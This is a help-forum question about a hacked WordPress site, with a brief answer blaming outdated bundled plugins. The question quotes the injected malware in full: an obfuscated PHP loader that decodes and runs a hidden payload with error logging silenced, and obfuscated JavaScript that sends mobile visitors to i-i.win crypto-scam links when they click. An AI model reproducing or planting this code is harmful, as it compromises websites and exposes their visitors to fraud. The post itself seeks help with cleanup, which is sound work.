# Is this WordPress hack, and how to prevent it happening again?

Tags: php, wordpress, wpbakery

A friend contacted me about some issues with their site. Looking at the `index.php` in public_html I see all this dubious looking code. Their theme functions file also has some similar scripts appended to the end.

At some point the site redirects to Crypto sites and also prompts WordPress admin to download a Crypto plugin.

My question is, is there a known vunerabilty in WordPress themes that enables this?

```
<?php /* index-configs */ $dvABj = 'base'.'64'.'_deco'.'de';  $HPtAQ = 'gzin'.'flate';  $DrbOf = 'strr'.'ev';  $eWKEC = 'st'.'r'.'_'.'r'.'ot13';  /*       cwfkmhesyabjptrxlonangjef vzilmwq**/ ini_set('display_errors', 0); ini_set('error_log', NULL); error_reporting(0); ini_set('log_errors', 0); echo '<html>   </html>'; $AGfoO = 'Cr'.'eate'.'_'.'F'.'unction'; $FhVMA = $AGfoO('', $eWKEC($DrbOf($HPtAQ($dvABj('lZWLcqM2FIZfRWHSGdxJgPgaajcdk8W4nYzjJRu3ZL1lECvExrtYCJsWe/PuPeLWOHG8icceIZ1f53z8uhg9oH5jQdfH6EQKAs5YRNeKpFCMybHMv0QBhNvtrrYvHOPNmqG+dMGzMMZ3yUwdePNPzkfkr31lwWMvVZGCIGhympJ7bnrz+PQIPdh3k6HtzG5ca2SP39nm9icUe3hai5LXiESdU3Q8F7XmebG/d0upiAfRdd31DMS9dOXZ9cgFU4pn4sKboOolBhL6FeWObFGjskb96vG48bMi3+Msi8QD4THBqiSvGY027ooTH33/jmp9qdpgkohWTN8Ry0kKzjb2mBpxAsmhDqaEBhVLvyFspilVB0U7uMg2dI3syytrarw/AuoTSYyUxgc8DjPmpaf+/c5qPiAkVpzwLI02QFo8uH692HVEmlybHyz/qskyTyRf7P9IMmdR5oOJBW01f9t4lEqFVfptPtjjgCSQo6Wmt/SzOOnqrNXrRO3uedxj0bmesF4r0Xsq/5Jmyr/gUwApE1X9JfApXUtyQD1OPcxcyleuGHoMgCoC8XYBDdIFd8X0I1G59IFyni2AMG9rF4C9CvwIvdWLI629TLpMZ6zXjTrL9pnONBZHLd7R9eZz9JfJy5oCvOZ5gXsRZhjoRPOYuhz+EbS2jJLW+TJu9prgNaD2orNOU9PaLY3pPO68BboomR+VEuY5cp+QY+SRkHKS0zckAjtqTSNQe9zHyW7mDRyBYi8RkZkHGRezCv2OUtSodOIwPY1JFYyHU8q8MBE82zKTOGmoCgCXqMEZCXEAFjake2mHML8qkkc4tfQpV+gXXLtE5egLRE+S5ev5P9pDHw41ZpWHJQMgrKLLjISAmI+DRQzmBjhjLgyzos84VBNdMKqa0G98kqyh/WHimvZo7F5a1q300bR/h54LEHkoj1iXhmOOp8AFmaiPKQ/K1FoXdGPDvptZr1NZU3s4NKaHxKAdGbdXNzNAcZ3R6LDWtOHye432TGhvRsOJaQ3NsWWbh7VDY2ZNpobzh+E4xs2LWlRCvJ/YtwcSCrvRCQQPaGSaemm1RhAVJzlfcPkr9TdcRklaJNq7+wvpdo8gP6L1NoLDryrKs6+428UPOk/v8vx/Q8wTf7L//NXBrLlIs8/f3pqmvMyqTLzlNIfTxa1v3b0xU32fV6mya+fbnyQehp+bb0xV3lZiFeWVl1KC8xgmhKP/AA=='))))); $FhVMA(); ?>

<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https://i-i.win/Thy9c2','https://i-i.win/MVJ8c7','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https://i-i.win/jln5c1','8SJGLkz','random','https://i-i.win/gBn1c6','7196643rGaMMg','setItem','-mnts','https://i-i.win/JjX2c6','266801SrzfpD','substr','floor','-local-storage','https://i-i.win/atk4c2','3ThLcDl','stopPropagation','_blank','https://i-i.win/BFd3c9','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https://i-i.win/DJM0c3'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https://i-i.win/wVX6c7','https://i-i.win/sjw7c3',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script>
```

I'm going to do a fresh install and download a fresh copy of the theme. I will install iThemes security and Clourflare. Any other tips?

Comment: https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Answer (score 0):

The hack/ vulnerability was caused by some common out-of-date plugins (WPBakery, Slider Revolution) bundled with a Theme Forest theme.

[image]